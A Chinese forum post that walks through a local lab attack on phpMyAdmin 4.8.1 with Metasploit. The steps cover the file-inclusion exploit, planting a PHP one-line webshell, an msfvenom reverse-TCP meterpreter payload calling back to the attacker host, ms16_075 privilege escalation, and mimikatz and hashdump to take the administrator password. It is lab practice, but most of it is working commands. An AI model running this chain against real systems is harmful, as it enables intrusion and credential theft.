本地搭建环境,Msf提权,拿管理员密码

yangroupaomo   ·   发表于 2021-10-29 14:27:12   ·   技术文章

环境搭建

1、将phpstudy设置为系统服务


2、打开管理工具中的服务,进入Apache界面,进行用户设置。

记得将phpstudy/apache/logs进行用户权限设置。

再来查看phpstudy中网站地址。http://192.168.211.130/phpMyAdmin-4.8.1/

本地环境搭建完成。

Msf提权

1、打开msfconsole

2、打开phpmyadmin模块,选用第3个攻击模块(文件包含造成文件执行漏洞)
search phpmyadmin

3、输入options ,查看界面。填入目标IP地址、目标密码、目标所在文件
set password root
set targeturi /phpMyAdmin-4.8.1/
set rhosts 192.168.211.130
然后run执行。

4、发现攻击成功,进入meterpreter界面。

5、现在可以写入一个PHP一句话木马。
edit 321.php
进入写码界面,敲击键盘a就可以进入,写入一句话木马。

敲击键盘上的a

写完按键盘esc进行保存,在按shift和: 在输入wq就切换回meterpreter界面。
输入dir,发现一句话木马写入成功。

接着就可以连接蚁剑。

根据提权补丁,我们运用ms15-015x64.exe进行提权。再将它重命名改为111.exe




添加用户成功。
继续回到msf,还是运用msf提权。
6、因为前面的攻击连接不稳定,现在需要制作一个msf自己的木马文件,让目标来访问我们的机器(不知道这个算不算反弹shell)。
7、新建一个终端窗口,输入
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.211.132 lport=1234 -f exe > shell.exe
IP地址必须与本机一致

8、返回刚刚的终端窗口,将shell上传。
upload shell.exe

execute -H -f shell.exe

9、在新窗口,打开msfconsole
接着打开监听模块
use exploit/multi/handler
设置payload
payload需要与上面的保持一致。
set payload windows/x64/meterpreter/reverse_tcp

10、设置本地地址,端口
set lhost 192.168.211.132
set lport 1234

11、run跑起来,
接着返回刚刚的窗口,输入
execute -H -f shell.exe
创建会话

新建窗口的监听模块成功进入meterpreter界面。

12、将进程保存为session 1
background

13、打开msf中本地信息搜集模块
use post/multi/recon/local_exploit_suggester

14、设置session为1
set session 1
Run跑起来,得到4个可以攻击的模块,对它们进行一一实验,看哪个能攻击成功。
15、发现exploit/windows/local/ms16_075_reflection_juicy攻击成功.
use exploit/windows/local/ms16_075_reflection_juicy
设置session为1
Set session 1

输入getuid,发现得到管理员权限

16、接着加载猕猴桃模块
load mimikatz
在获取管理员密码
Kerberos
发现获得一串乱码。

17、输入ps,查看进程。有哪些在管理员权限下

18、调用412进程。
migrate 412
输入hashdump,对密码进行解密

再来查看管理员密码
Kerberos

风哥多给点金币,穷。。。。。。

用户名金币积分时间理由
Track-劲夫 20.00 0 2021-10-29 17:05:04 活动奖励
Track-劲夫 40.00 0 2021-10-29 17:05:57 一个受益终生的帖子~~

打赏我,让我更有动力~

0 条回复   |  直到 2021-10-29 | 1423 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.